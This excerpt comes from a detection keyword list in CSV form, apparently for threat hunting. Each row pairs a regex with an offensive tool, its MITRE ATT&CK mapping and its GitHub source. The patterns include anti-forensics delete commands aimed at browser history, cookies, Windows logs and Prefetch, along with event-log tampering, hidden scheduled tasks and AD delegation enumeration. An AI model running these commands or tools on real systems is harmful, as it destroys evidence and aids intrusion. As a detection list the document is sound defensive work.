"*del /f /s /q fscan.exe*",".{0,1000}del\s\/f\s\/s\s\/q\sfscan\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40690"
"*del /f /s /q npc.exe*",".{0,1000}del\s\/f\s\/s\s\/q\snpc\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40691"
"*DEL /q /f %appdata%\Google\Chrome\""User Data""\Default\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Google\\Chrome\\\""User\sData\""\\Default\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40692"
"*DEL /q /f %appdata%\Google\Chrome\""User Data""\Default\History\*.*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Google\\Chrome\\\""User\sData\""\\Default\\History\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40693"
"*DEL /q /f %appdata%\Microsoft\Windows\Recent\*.*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Microsoft\\Windows\\Recent\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40694"
"*DEL /q /f %windir%\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40695"
"*DEL /q /f %windir%\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40696"
"*DEL /q /f %windir%\Prefetch\*.pf*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Prefetch\\.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40697"
"*DEL /q /f %windir%\system\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40698"
"*DEL /q /f %windir%\system\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40699"
"*DEL /q /f %windir%\system32\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system32\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40700"
"*DEL /q /f %windir%\system32\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system32\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40701"
"*DEL /q /f %windir%\Temp\*.inf*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Temp\\.{0,1000}\.inf.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40702"
"*DEL /q /f %windir%\Temp\*.lnk*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Temp\\.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40703"
"*DEL /q /f /s %appdata%\Microsoft\Windows\Cookies\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Cookies\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40704"
"*DEL /q /f /s %appdata%\Microsoft\Windows\Cookies\*.**",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Cookies\\.{0,1000}\..{0,1000}.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40705"
"*DEL /q /f /s %appdata%\Microsoft\Windows\Recent\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Recent\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40706"
"*DEL /q /f /s %appdata%\Mozilla\Firefox\Profiles\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Mozilla\\Firefox\\Profiles\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40707"
"*DEL /q /f /s %userprofile%\*.log*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%userprofile\%\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40708"
"*DEL /q /f /s %userprofile%\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%userprofile\%\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40709"
"*del C:\\Windows\\AppCompat\\Programs\\RecentFileCache.bcf*",".{0,1000}del\sC\:\\\\Windows\\\\AppCompat\\\\Programs\\\\RecentFileCache\.bcf.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40710"
"*del C:\Windows\AppCompat\Programs\RecentFileCache.bcf*",".{0,1000}del\sC\:\\Windows\\AppCompat\\Programs\\RecentFileCache\.bcf.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40711"
"*del C:\Windows\AppCompat\Programs\RecentFileCache.bcf*",".{0,1000}del\sC\:\\Windows\\AppCompat\\Programs\\RecentFileCache\.bcf.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40712"
"*del Green.vbs*",".{0,1000}del\sGreen\.vbs.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","40714"
"*del Ps1ToVbs.ps1""*",".{0,1000}del\sPs1ToVbs\.ps1\"".{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","40715"
"*deleg_enum_imp*",".{0,1000}deleg_enum_imp.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","40717"
"*Delegation/delegation.py*",".{0,1000}Delegation\/delegation\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","40718"
"*delegation_constrained_objects.txt*",".{0,1000}delegation_constrained_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","40719"
"*delegation_constrained_w_protocol_transition_objects.txt*",".{0,1000}delegation_constrained_w_protocol_transition_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","40720"
"*delegation_rbcd_objects.txt*",".{0,1000}delegation_rbcd_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","40721"
"*delegation_unconstrained_objects.txt*",".{0,1000}delegation_unconstrained_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","40722"
"*DelegationBOF.*",".{0,1000}DelegationBOF\..{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","40723"
"*DELETE FROM LDAPHUNTERFINDINGS*",".{0,1000}DELETE\sFROM\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","40724"
"*Delete specified evt file's eventlog record.You need to set StartTime and EndTime*",".{0,1000}Delete\sspecified\sevt\sfile\'s\seventlog\srecord\.You\sneed\sto\sset\sStartTime\sand\sEndTime.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#content","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","40725"
"*Delete specified evt file's eventlog record.You need to set StartTime and EndTime*",".{0,1000}Delete\sspecified\sevt\sfile\'s\seventlog\srecord\.You\sneed\sto\sset\sStartTime\sand\sEndTime.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#content","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","40726"
"*Delete the eventlog by rewriting the evtx file*",".{0,1000}Delete\sthe\seventlog\sby\srewriting\sthe\sevtx\sfile.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#content","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","40727"
"*Delete the eventlog by using WinAPI EvtExportLog*",".{0,1000}Delete\sthe\seventlog\sby\susing\sWinAPI\sEvtExportLog.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#content","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","40728"
"*DeleteKey(*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\*",".{0,1000}DeleteKey\(.{0,1000}SOFTWARE\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","#registry","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","40729"
"*DeletePSscriptSignning.bat*",".{0,1000}DeletePSscriptSignning\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40730"
"*DeleteScheduleTask(LPCSTR computerName*",".{0,1000}DeleteScheduleTask\(LPCSTR\scomputerName.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","40731"
